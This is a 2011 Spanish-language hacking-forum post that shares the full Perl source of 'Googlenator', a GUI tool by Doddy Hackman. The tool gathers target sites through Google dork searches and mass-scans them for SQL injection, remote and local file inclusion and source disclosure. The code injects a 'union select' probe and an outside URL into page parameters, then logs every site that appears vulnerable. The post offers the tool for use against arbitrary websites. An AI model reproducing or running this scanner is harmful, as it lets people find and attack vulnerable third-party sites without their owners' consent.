[Perl] G00gl3nator By Doddy H

BigBear · Julio 03, 2011, 09:45:53 PM

Bueno ,este es un scanner en su version grafica ,este programa puede scanear

SQLI
RFI
LFI

Full Source Discloure

Tambien pueden buscar en google string en google con , los resultados
son guardados en una carpeta que el programa instalar al ejecutarse

Código: perl


#!usr/bin/perl
#Googlenator (C) Doddy Hackman 2011

use Tk;
use Tk::ROText;
use Tk::FileSelect;
use URI::Split qw(uri_split);
use Cwd;
use WWW::Mechanize;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $nave = WWW::Mechanize->new(autocheck => 0);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

installer();

my $new = MainWindow->new(-background=>"black");

$new->title("Googlenator (C) Doddy Hackman 2011");
$new->geometry("780x530");
$new->resizable(0,0);

$d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
$d->pack(-side=>"top",-fill=>"x");

$scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
$scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
$scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
$scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);

$logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
$logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
$logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
$logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
$logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);

my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
head();

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

$new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

$new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
$new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
$new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");
	
MainLoop;

head();

sub googler {

my $google = $google->get;
my $pages = $pages->get;
my $dorks = $dorks->get;

head();

$box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

my @webas = google($google,$dorks,$pages);

$box->insert("end","\t\t[+] Cleaning\n\n");
$box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

for(@webas) {
$new->update();
$box->insert("end","\t\t[Link] : ".$_."\n");
savefile($dorks.".txt",$_);
}

$box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
$box->insert("end","\t\t[+] Finished\n\n");
	
}

sub loadsql {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scansql($page);
}

sub scansql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
$box->insert("end","\t\t[+] SQLI : $page\n");
savefilevul("sql-logs.txt",$page);
}}}

sub loadrfi {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanrfi($page);
}

sub scanrfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
$box->insert("end","\t\t[+] RFI : $page\n");
savefilevul("rfi-logs.txt",$page);
}}}

sub loadlfi {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanlfi($page);
}


sub scanlfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$box->insert("end","\t\t[+] LFI : $page\n");
savefilevul("lfi-logs.txt",$page);
}}}

sub loadfsd {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanfsd($page);
}

sub scanfsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
$box->insert("end","\t\t[+] Full Source Discloure : $page\n");
savefilevul("fsd-logs.txt",$page);
}}}}

sub head {

$box->delete("0.0","end");

$box->insert("end","
           @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@ 
         @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@ 
         @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@  
         @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@ 
           @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@



	
");
}

sub about {
$about = MainWindow->new(-background=>"black");
$about->title("Googlenator v0.3");
$about->geometry("300x110");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
}

sub exitx {
exit(1);
}

sub savefilevul {
open (SAVE,">>logs/vulz/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub toma {
return $nave->get($_[0])->content;
}

sub dame_link {
return $nave->find_all_links();
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

sub savefile {
open (SAVE,">>logs/search/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub google {

for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
$new->update();
toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
@links = dame_link();
for my $l(@links) {
if ($l->url() =~/webcache.googleusercontent.com/) {
push(@url,$l->url());
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds; 
}


sub installer {

unless (-d "logs/") {
mkdir("logs/","777");
mkdir("logs/search","777");
mkdir("logs/vulz","777");
}
}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub loadgoogle {
system("start ".getcwd()."/logs/search/");
}

sub loadfilesql {
system("start logs/vulz/sql-logs.txt");
}


sub loadfilelfi {
system("start logs/vulz/lfi-logs.txt");
}


sub loadfilerfi {
system("start logs/vulz/rfi-logs.txt");
}


sub loadfilefsd {
system("start logs/vulz/fsd-logs.txt");
}

# ¿ The End ?

[Perl] G00gl3nator By Doddy H

BigBear

Julio 03, 2011, 09:45:53 PM Ultima modificación: Marzo 14, 2015, 10:03:04 AM por Expermicid